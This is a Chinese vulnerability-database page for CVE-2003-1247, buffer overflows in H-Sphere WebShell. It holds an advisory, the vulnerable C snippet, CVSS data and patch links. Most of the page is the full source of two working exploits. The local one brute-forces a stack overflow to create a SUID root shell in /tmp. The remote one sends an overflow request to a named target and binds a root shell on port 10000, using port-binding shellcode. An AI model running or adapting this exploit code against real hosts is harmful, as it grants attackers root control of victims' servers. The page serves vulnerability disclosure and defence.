CVE-2003-1247
CVSS7.5
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:26
NMCOE    

[原文]Multiple buffer overflows in H-Sphere WebShell 2.3 allow remote attackers to execute arbitrary code via (1) a long URL content type in CGI::readFile, (2) a long path in diskusage, and (3) a long fname in flist.


[CNNVD]H-Sphere Webshell flist()远程缓冲区溢出漏洞(CNNVD-200312-158)

        
        Webshell是一款基于WEB的应用程序,可以作为文件管理器进行文件上传和下载处理,使用用户名/密码方式进行认证,以suid root属性运行。
        Webshell使用的flist()函数存在缓冲区溢出,远程攻击者可以利用这个漏洞覆盖堆栈中数据,可能以root用户权限在系统上执行任意指令。
        flist.c包含如下flist()函数:
         char fname[256];
         int esize=strlen(ext);
         int fsize;
         if ((cdir=opendir(dname))!=NULL) {
         while ((cfile=readdir(cdir)) != NULL) {
         if ((esize>=(fsize=strlen(cfile->d_name))) ||
         (strstr(cfile->d_name+fsize-esize,ext)==NULL)) continue;
         strcpy(fname, dname);
         strcat(fname, "/");
         strcat(fname, cfile->d_name);
        其中接收外部参数拷贝到fname[]数组时缺少正确检查,可导致EIP覆盖,精心构建提交数据可能以root用户权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1247
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1247
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-158
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/6540
(PATCH)  BID  6540
http://www.securityfocus.com/bid/6538
(PATCH)  BID  6538
http://www.securityfocus.com/bid/6537
(PATCH)  BID  6537
http://www.securityfocus.com/archive/1/305313
(VENDOR_ADVISORY)  BUGTRAQ  20030106 Remote root vuln in HSphere WebShell
http://www.iss.net/security_center/static/11003.php
(PATCH)  XF  hsphere-webshell-flist-bo(11003)
http://www.iss.net/security_center/static/11002.php
(PATCH)  XF  hsphere-webshell-diskusage-bo(11002)
http://www.iss.net/security_center/static/10999.php
(PATCH)  XF  hsphere-webshell-readfile-bo(10999)
http://psoft.net/misc/webshell_patch.html
(PATCH)  MISC  http://psoft.net/misc/webshell_patch.html
http://www.securitytracker.com/id?1005893
(UNKNOWN)  SECTRACK  1005893
http://www.securityfocus.com/bid/6527
(UNKNOWN)  BID  6527
http://secunia.com/advisories/7832
(UNKNOWN)  SECUNIA  7832

- 漏洞信息

H-Sphere Webshell flist()远程缓冲区溢出漏洞
高危 输入验证
2003-12-31 00:00:00 2006-01-17 00:00:00
远程  
        
        Webshell是一款基于WEB的应用程序,可以作为文件管理器进行文件上传和下载处理,使用用户名/密码方式进行认证,以suid root属性运行。
        Webshell使用的flist()函数存在缓冲区溢出,远程攻击者可以利用这个漏洞覆盖堆栈中数据,可能以root用户权限在系统上执行任意指令。
        flist.c包含如下flist()函数:
         char fname[256];
         int esize=strlen(ext);
         int fsize;
         if ((cdir=opendir(dname))!=NULL) {
         while ((cfile=readdir(cdir)) != NULL) {
         if ((esize>=(fsize=strlen(cfile->d_name))) ||
         (strstr(cfile->d_name+fsize-esize,ext)==NULL)) continue;
         strcpy(fname, dname);
         strcat(fname, "/");
         strcat(fname, cfile->d_name);
        其中接收外部参数拷贝到fname[]数组时缺少正确检查,可导致EIP覆盖,精心构建提交数据可能以root用户权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Positive Software
        -----------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        升级程序:
        
        http://www.hsphere.com/WebShell-2.4.tar.gz

        或下载补丁:
        
        http://www.psoft.net/misc/webshell_patch.html

- 漏洞信息 (22128)

H-Sphere Webshell 2.4 local root exploit (EDBID:22128)
linux local
2003-01-06 Verified
0 Carl Livitt
N/A [点击下载]
source: http://www.securityfocus.com/bid/6527/info

A vulnerability has been discovered in H-Sphere Webshell. During the pre-authentication phase Webshell fails to perform sufficient bounds checking on user-supplied HTTP parameters. As a result, a malicious attacker may be able to trigger a buffer overrun.

Successful exploitation of this issue would allow an attacker to overwrite the vulnerable function's instruction pointer. By causing the program to return to attacker-supplied instructions, it may be possible to execute arbitrary code with the privileges of the target process.

It should be noted that this issue was discovered in H-Sphere 2.3 RC3. It is not yet known whether earlier versions are also vulnerable. 

/*
 * Local r00t exploit for Webshell 2.4 (possibly other versions).
 * Vulnerability found and exploit written by Carl Livitt
 * (carl (@) learningshophull.co.uk).
 *

Exploits a simple stack-based buffer overflow in CGI.C of the
HSphere webshell component which is installed SUID & GUID root
by default.

Uses a bruteforce method to guess the return address on the stack
and the amount of data to overflow the buffer with; this ensures
it works under many different environments. I originally hardcoded
these values, but found that this was unreliable.

Copy this file (webshell-local.c) to /tmp and then:

cd /tmp
gcc -o webshell-local webshell-local.c
cd /path/to/the/webshell/directory
/tmp/webshell-local

That should get you r00t without any messing about.

*/


#include <sys/types.h>
#include <sys/stat.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>

#define EGG_SIZE_START 257
#define EGG_SIZE_END 291
#define RET_ADDR_START 0xbfffe910
#define RET_ADDR_END 0xbfffffff
#define RET_ADDR_INCREMENT 256
#define CONTENT_LENGTH 42
#define SHELLSCRIPT_FILE "/tmp/zz"
#define EXPLOIT_FILE "/tmp/.webshell.txt"
#define ROOT_SHELL "/tmp/rs"
#define WEBSHELL_PROGRAM "./webshell"

void create_shellscript_file();
void make_shellcode();
void make_exploit_buffer();
void setup_environment();
void make_exploit_file();

char shellcode[] =
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" // setuid(0)
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/zz"; // aleph1 execve() of /bin/sh

char sc[1024];
char egg[1024];

char shell_script[]=
        "#!/bin/sh\n"
        "cd /tmp\n"
        "cat << ROOTSHELL > "ROOT_SHELL".c\n"
        "main() { setuid(0);setgid(0);system(\"/bin/bash\");}\n"
        "ROOTSHELL\n"
        "gcc -o "ROOT_SHELL" "ROOT_SHELL".c\n"
        "chown root:root "ROOT_SHELL"*\n"
        "chmod 6777 "ROOT_SHELL"\n"
        "chmod 0666 "ROOT_SHELL".c\n";

char greeting[]="Webshell 2.4 bruteforce exploit for Linux x86 - by Carl Livitt\n";

int EGG_SIZE=EGG_SIZE_START;
unsigned long RET_ADDR=(unsigned long)RET_ADDR_START;
char *env[4];

/*
 * The fun begins here...
 */

main(int argc, char **argv) {
        int brute_force_mode=1, status, pid;
        struct stat s;

        /*
         * Check to see if the exploit has been run before...
         */
        if(stat((char *)ROOT_SHELL,&s)==0) {
                printf("Root shell already exists... executing...\n");
                system(ROOT_SHELL);
                exit(0);
        }

        /*
         * Make sure that the webshell binary can be found
         * and is SUID root
         */
        if(stat(WEBSHELL_PROGRAM, &s)!=0) {
                printf(WEBSHELL_PROGRAM" not found!\n");
                exit(1);
        } else if(!(s.st_mode&S_ISUID)) {
                printf(WEBSHELL_PROGRAM" is not SUID root!\n");
                exit(1);
        }

        /*
         * Start the bruteforce loop...
         */
        printf("%s\nBruteforcing EGG_SIZE and RET_ADDR..", greeting);
        do {
                // setup exploit buffers
                make_shellcode();
                make_exploit_buffer();
                setup_environment();
                make_exploit_file();
                create_shellscript_file();
                printf(".");fflush(stdout);

                // fork and execute the webshell binary, passing it the
                // exploit input.
                if((pid=fork())==0) {
                        system(WEBSHELL_PROGRAM" < "EXPLOIT_FILE" &>/dev/null");
                        exit(0);
                } else {
                        waitpid(pid, &status, 0);
                }

                // If ROOT_SHELL exists, then the exploit was successful.
                // So execute it!
                if(stat((char *)ROOT_SHELL,&s)==0) {
                        printf("\nEntering r00t shell...\n\n");
                        system(ROOT_SHELL);
                        exit(0);
                }

                // The ROOT_SHELL did not exist, so adjust the bruteforce
                // parameters and continue...
                EGG_SIZE++;
                if(EGG_SIZE>EGG_SIZE_END) {
                        RET_ADDR+=RET_ADDR_INCREMENT;
                        if(RET_ADDR>RET_ADDR_END) {
                                printf("Leaving bruteforce mode...\n");
                                brute_force_mode=0;
                        } else {
                                EGG_SIZE=EGG_SIZE_START;
                        }
                }
        } while(brute_force_mode);
        printf("Bruteforce exhausted - EXPLOIT FAILED.\n");
}

/*
 * Creates the file to be used as stdin for webshell.
 */
void make_exploit_file() {
        FILE *fp;

        if((fp=fopen(EXPLOIT_FILE,"w"))==NULL) {
                printf("Could not create exploit file %s\n", EXPLOIT_FILE);
                exit(1);
        }
        fprintf(fp, "--%s\n", egg+CONTENT_LENGTH);
        fprintf(fp, "Content-Disposition: form-data; name=\"TESTNAME\"; filename=\"TESTFILENAME\"\r\n\r\n");
        fclose(fp);
}

/*
 * Create the malicious environment in which webshell will run
 */
void setup_environment() {
        int i;

        unsetenv("S");
        unsetenv("CONTENT_LENGTH");
        unsetenv("REQUEST_METHOD");
        unsetenv("CONTENT_TYPE");
        env[0]=strdup(egg);
        env[1]=strdup(sc);
        env[2]=strdup("CONTENT_LENGTH=261");
        env[3]=strdup("REQUEST_METHOD=POST");
        env[4]=NULL;
        for(i=0;i<4;i++)
                putenv(env[i]);
}

/*
 * It is the 'boundary' section of a multipart/form-data MIME type
 * that overflows the buffer in webshell. This function creates the
 * malicious boundary.
 */
void make_exploit_buffer() {
        int i;

        memset(egg, 0, EGG_SIZE-1);
        memcpy(egg, "CONTENT_TYPE=multipart/form-data boundary=", CONTENT_LENGTH);
        for(i=0;i<EGG_SIZE; i+=4) {
                egg[i+CONTENT_LENGTH]=RET_ADDR&0xff;
                egg[i+CONTENT_LENGTH+1]=(RET_ADDR>>8)&0xff;
                egg[i+CONTENT_LENGTH+2]=(RET_ADDR>>16)&0xff;
                egg[i+CONTENT_LENGTH+3]=(RET_ADDR>>24)&0xff;
        }
        egg[EGG_SIZE+CONTENT_LENGTH-1]='\0';
}

/*
 * Makes a 1024-byte buffer filled with NOPs and shellcode
 */
void make_shellcode() {
        memset(sc, 0x90,1024);
        sc[0]='S';
        sc[1]='=';
        memcpy(sc + 1024 - (strlen(shellcode)+1), shellcode, strlen(shellcode));
        sc[1023]='\0';
}

/*
 * Generate the shellscript that will be executed by the shellcode.
 * By default, it will create a SUID root shell in /tmp
 */
void create_shellscript_file() {
        FILE *fp;

        if((fp=fopen(SHELLSCRIPT_FILE,"w"))==NULL) {
                printf("Could not create %s\n", SHELLSCRIPT_FILE);
                exit(1);
        }
        fprintf(fp, "%s", shell_script);
        fclose(fp);
        chmod(SHELLSCRIPT_FILE, S_IXOTH | S_IROTH | S_IWOTH | S_IXUSR | S_IRUSR | S_IWUSR);
}

		

- 漏洞信息 (22129)

H-Sphere Webshell 2.4 remote root exploit (EDBID:22129)
linux remote
2003-01-06 Verified
0 Carl Livitt
N/A [点击下载]
source: http://www.securityfocus.com/bid/6527/info
 
A vulnerability has been discovered in H-Sphere Webshell. During the pre-authentication phase Webshell fails to perform sufficient bounds checking on user-supplied HTTP parameters. As a result, a malicious attacker may be able to trigger a buffer overrun.
 
Successful exploitation of this issue would allow an attacker to overwrite the vulnerable function's instruction pointer. By causing the program to return to attacker-supplied instructions, it may be possible to execute arbitrary code with the privileges of the target process.
 
It should be noted that this issue was discovered in H-Sphere 2.3 RC3. It is not yet known whether earlier versions are also vulnerable.

/*
 * Remote r00t exploit for Webshell 2.4 (possibly other versions).
 * Vulnerability found and exploit written by Carl Livitt
 * (carl (@) learningshophull.co.uk).
 *

Exploits a simple stack-based buffer overflow in CGI.C of the
HSphere webshell component which is installed SUID & GUID root
by default.

This exploit will bind a r00t shell to port 10000 (by default) of
the remote box. Feel free to use any shellcode of your choice.

This code is a butchered version of the local exploit for
webshell. It works on my test box, and won't be refined any further,
although the bruteforcer should work on most webshell installations.

To exploit:

gcc -o webshell-remote webshell-remote.c
./webshell-remote -t www.host-to-exploit.com -l /path/to/webshell

That's it. It'll work on almost all vulnerable hosts (running Linux).
*/


#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <time.h>

/*
 * Play with these to make it work (if it fails!)
 */
#define EGG_SIZE_START 280
#define EGG_SIZE_END 291
#define RET_ADDR_START 0xbffff010
#define RET_ADDR_END 0xbfffffff
#define RET_ADDR_INCR 768
#define COMMAND1 "id\n"
#define COMMAND2 "uname -a\n"
#define ROOT_SHELL_PORT 10000

// should only be needed against localhost. Set to 0 to disable.
#define SLEEP_TIME 125000000L

// don't play with this, you'll only break things.
#define CONTENT_LENGTH 43

void make_shellcode();
void make_exploit_buffer();
void make_boundary_buffer();

/*
 * 88 bytes portbinding shellcode - linux-x86
 * - by bighawk (bighawk@warfare.com)
 *   setuid(0) and setgid(0) added by Carl Livitt
 */
char shellcode[] =
   "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80" // setuid(0),setgid(0)
   "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80"
   "\x89\xc7\x52\x66\x68"
   "XX" // XX is port number
   "\x43\x66\x53\x89\xe1\xb0\x10\x50\x51"
   "\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57"
   "\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80"
   "\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
   "\x51\x53\x89\xe1\xb0\x0b\xcd\x80"; // bind shell on port 10000

/*
 * Ahhhh, global variables make life easy :)
 */
char sc[1024];
char egg[1024];
char exploit_buf[4096];
char target[256];
int port=80;
char location[1024];
unsigned long RET_ADDR;
int EGG_SIZE, root_shell_port=ROOT_SHELL_PORT;

char usage[]=
"-h           This cruft\n"
"-t host      Target host (eg. www.xyzzy.com)\n"
"-p port      Target port [80]\n"
"-P port      Port to bind shell on remote host [10000]\n"
"-l location  Location of webshell (eg. /cgi-bin/webshell)\n\n"
"Example:\n\n"
"./exp-remote -t www.xyzzy.com -p 8080 -P 12345 -l /psoft/servlet/psoft.hsphere.CP\n\n"
"This would attack http://www.xyzzy.com:8080/psoft/servlet/psoft.hsphere.CP\n"
"and bind a root shell to port 12345 if successful.\n\n";

/*
 * The fun begins here...
 */

 main(int argc, char **argv) {
        int ch, websock, shellsock,r=1;
        struct hostent *host;
        struct sockaddr_in saddr;
        char buf[8092];
        struct timespec sleepTime;
        fd_set rfds;
        int retval;

        /*
         * Process command-line args
         */
        while((ch=getopt(argc,argv,"ht:p:P:l:"))!=-1) {
                switch(ch) {
                        case 'h':
                                printf("%s",usage);
                                exit(0);
                                break;
                        case 't':
                                strncpy(target, optarg, sizeof(target)-1);
                                break;
                        case 'p':
                                port=atoi(optarg);
                                break;
                        case 'P':
                                root_shell_port=atoi(optarg);
                                break;
                        case 'l':
                                strncpy(location, optarg, sizeof(location)-1);
                                break;
                        default:
                                printf("%s", usage);
                                exit(0);
                                break;
                }
        }

        /*
         * Tell the attacker we're about to start the exploit.
         * Look up the IP address of the host specified on the
         * command-line
         */
        if((host=gethostbyname(target))==NULL) {
                printf("Host not found. Usage:\n%s\n", usage);
                exit(1);
        }
        printf("Exploiting http://%s:%d%s%s..", target, port, (location[0]=='/')?"":"/", location);

        /*
         * Start the bruteforce loop
         */
        for(RET_ADDR=RET_ADDR_START; RET_ADDR<RET_ADDR_END; RET_ADDR+=RET_ADDR_INCR) {
                for(EGG_SIZE=EGG_SIZE_START; EGG_SIZE<EGG_SIZE_END; EGG_SIZE++) {
                        /*
                         * Setup the exploit strings and
                         * HTTP headers. The Accept-Encoding header
                         * will hold shellcode: it will be passed
                         * to the environment of webshell giving us
                         * a reasonably predictable RET address.
                         */
                        make_shellcode();
                        make_boundary_buffer();
                        make_exploit_buffer();

                        /*
                         * Now connect to the host and send the exploit
                         * string...
                         */
                        if((websock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) {
                                perror("socket()");
                                exit(1);
                        }
                        memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
                        saddr.sin_family=AF_INET;
                        saddr.sin_addr.s_addr=*((unsigned long *)host->h_addr_list[0]);
                        saddr.sin_port=htons(port);
                        printf(".");fflush(stdout);
                        if(connect(websock, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
                                perror("connect()");
                                exit(1);
                        }
                        send(websock, exploit_buf, strlen(exploit_buf), 0);
                        close(websock);

                        /*
                         * This pause is needed when exploiting localhost.
                         * It can be ignored against remote hosts (I think!)
                         */
                        sleepTime.tv_sec=0;
                        sleepTime.tv_nsec=SLEEP_TIME;
                        nanosleep(&sleepTime, &sleepTime);

                        /*
                         * If the exploit attempt succeded, there should now
                         * be a r00t shell bound to port xxxxx of the target
                         * box. Lets try and connect to it...
                         */
                        if((shellsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) {
                                perror("socket()");
                                exit(1);
                        }
                        memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
                        saddr.sin_family=AF_INET;
                        saddr.sin_addr.s_addr=*((unsigned long *)host->h_addr_list[0]);
                        saddr.sin_port=htons(root_shell_port);
                        if(connect(shellsock, (struct sockaddr *)&saddr, sizeof(saddr))==0)
                                goto CONNECTED; // goto? Damn amateurs...

                        /*
                         * If we get here, the exploit failed. Try the next
                         * iteration of the brute force loop.
                         */
                        close(shellsock);
                }
        }
        /*
         * If we get here, then the bruteforce was exhausted without a
         * succesful exploit.
         */
        printf("\nFailed to exploit the webshell binary. :(\n");
        exit(0);

CONNECTED:
        /*
         * We're now connected to the remote host. Issue
         * some commands... ('id' and 'uname -a' by default)
         */
        printf("\n\nExploit successful!\nIssuing some commands...\n\n");
        if(send(shellsock, COMMAND1, strlen(COMMAND1), 0)==-1) {
                perror("send()");
                exit(1);
        }
        buf[recv(shellsock, buf, sizeof(buf)-1, 0)]='\0';
        printf("%s", buf);
        send(shellsock, COMMAND2, strlen(COMMAND2), 0);
        buf[recv(shellsock, buf, sizeof(buf)-1, 0)]='\0';
        printf("%s\n", buf);
        printf("You are now at a bash prompt...\n");

        /*
         * Now let the attacker issue commands to the remote
         * shell, just as if (s)he had launched 'nc host 10000'.
         * Note the dodgy coding of assigning NULLs to the buf[]
         * array. What would happen if recv() or read() returned -1 ?
         * You guessed it: we mung some variables on the stack!
         */
        do {
                FD_ZERO(&rfds);
                FD_SET(0, &rfds);
                FD_SET(shellsock, &rfds);
                retval=select(shellsock+1, &rfds, NULL, NULL, NULL);
                if(retval) {
                        if(FD_ISSET(shellsock, &rfds)) {
                                buf[(r=recv(shellsock, buf, sizeof(buf)-1,0))]='\0';
                                printf("%s", buf);
                        }
                        if(FD_ISSET(0, &rfds)) {
                                buf[(r=read(0, buf, sizeof(buf)-1))]='\0';
                                send(shellsock, buf, strlen(buf), 0);
                        }

                }
        } while(retval && r); // loop until connection terminates
        close(shellsock);
        exit(0);
}

/*
 * Create the HTTP request that will setup the exploit
 * conditions in webshell. Shellcode is stored in the
 * Accept-Encoding HTTP header.
 */
void make_exploit_buffer() {
        sprintf(exploit_buf,"POST %s HTTP/1.1\n",location);
        sprintf(exploit_buf,"%sHost: %s\n",exploit_buf,target);
        sprintf(exploit_buf,"%sAccept-Encoding: %s\n",exploit_buf, sc);
        sprintf(exploit_buf,"%s%s\n",exploit_buf,egg);
        sprintf(exploit_buf,"%sContent-Length: %d\n\n",exploit_buf,EGG_SIZE*2);
        sprintf(exploit_buf,"%s--%s\n",exploit_buf, egg+CONTENT_LENGTH);
        sprintf(exploit_buf,"%sContent-Disposition: form-data; name=\"TESTNAME\"; filename=\"TESTFILENAME\"\r\n\r\n",exploit_buf);
        sprintf(exploit_buf,"%s%-*s\n",exploit_buf, EGG_SIZE*4," ");
}

/*
 * Create the buffer that holds the 'boundary' data. This
 * is what actually overflows the buffer on the stack.
*/
void make_boundary_buffer() {
        int i;

        memset(egg, 0, EGG_SIZE-1);
        memcpy(egg, "Content-Type: multipart/form-data boundary=", CONTENT_LENGTH);
        for(i=0;i<EGG_SIZE; i+=4) {
                egg[i+CONTENT_LENGTH]=RET_ADDR&0xff;
                egg[i+CONTENT_LENGTH+1]=(RET_ADDR>>8)&0xff;
                egg[i+CONTENT_LENGTH+2]=(RET_ADDR>>16)&0xff;
                egg[i+CONTENT_LENGTH+3]=(RET_ADDR>>24)&0xff;
        }
        egg[EGG_SIZE+CONTENT_LENGTH-1]='\0';
}

/*
 * Creates a 1024-byte buffer holding NOPs and shellcode.
 */
void make_shellcode() {
        // Fill in the port number
        shellcode[33]=htons(root_shell_port)&0xff;
        shellcode[34]=(htons(root_shell_port)>>8)&0xff;

        // Finish making shellcode buffer
        memset(sc, 0x90,1024);
        memcpy(sc + 1024 - (strlen(shellcode)+1), shellcode, strlen(shellcode));
        sc[1023]='\0';
}

		

- 漏洞信息

60390
H-Sphere WebShell CGI::readFile URL Content Type Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-01-06 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站